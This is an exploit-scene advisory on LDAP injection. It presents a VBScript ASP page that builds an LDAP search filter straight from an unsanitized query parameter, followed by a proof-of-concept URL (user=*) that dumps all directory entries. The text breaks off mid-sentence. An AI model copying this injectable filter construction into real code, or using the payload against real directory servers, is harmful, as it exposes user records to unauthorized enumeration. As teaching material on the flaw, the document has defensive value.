[+] Vulnerability : LDAP Injection
[+] Category : Implemented Web exploit
[+] Category : Attack Technique
[+] Author : mc2_s3lector
[+] dork : X/o\"
[+] Contact : www.yogyacarderlink.web.id
[+] date : 4-2-10
[+] Big thanks to : Allah SWT, jasakom, KeDai Computerworks, 0n3-d4y n3ro, eplaciano, all*.indonesian like a coding,
---------------------------------------------------------------------------
Directory access protocol/directory manipulation, protocol breaker -> standard protocol, custom query statement, page request, component execute command, database server, web apps services modify, remove, etc.
---------------------------------------------------------------------------
code:

<%@ Language=VBScript %>
<%
    Dim userName
    Dim filter
    Dim ldapObj
    Dim i

    Const LDAP_SERVER = "ldap.example"

    ' (*1) Bug line: the user parameter is taken straight from the request;
    '      the only check made on it below is whether it is empty.
    userName = Request.QueryString("user")

    If (userName = "") Then
        Response.Write("Invalid request. Please specify a valid user name<br>")
        Response.End()
    End If

    ' userName from (*1) is used to initialize the filter variable on this line;
    ' the LDAP query uses this filter directly at (*3).
    filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry

    ' Create the LDAP object and set the base DN
    Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
    ldapObj.ServerName = LDAP_SERVER
    ldapObj.DN = "ou=people,dc=spilab,dc=com"

    ' Setting the search filter
    ldapObj.SearchFilter = filter ' (*3) SearchFilter is set from filter on this line
    ldapObj.Search

    ' Showing the user enumeration info
    While ldapObj.result = 1 ' (*4)
        Response.Write("<p>")
        Response.Write("User information for : " + ldapObj.AttrValue(0) + "<br>")
        For i = 0 To ldapObj.AttrCount - 1
            Response.Write(ldapObj.AttrType(i) + " : " + ldapObj.AttrValue(i) + "<br>")
        Next
        Response.Write("</p>")
    Wend ' (*5)
%>
---------------------------------------------------------------------------
The request controls the query sent to the LDAP server, and the query result is returned by the loop from (*4) to (*5).

POC:
http://server/ldapsearch.asp?user=*

Send the * character in the parameter user. The filter variable in the code is then initialized with (uid=*). The resulting LDAP statement will make the server return
---------------------------------------------------------------------------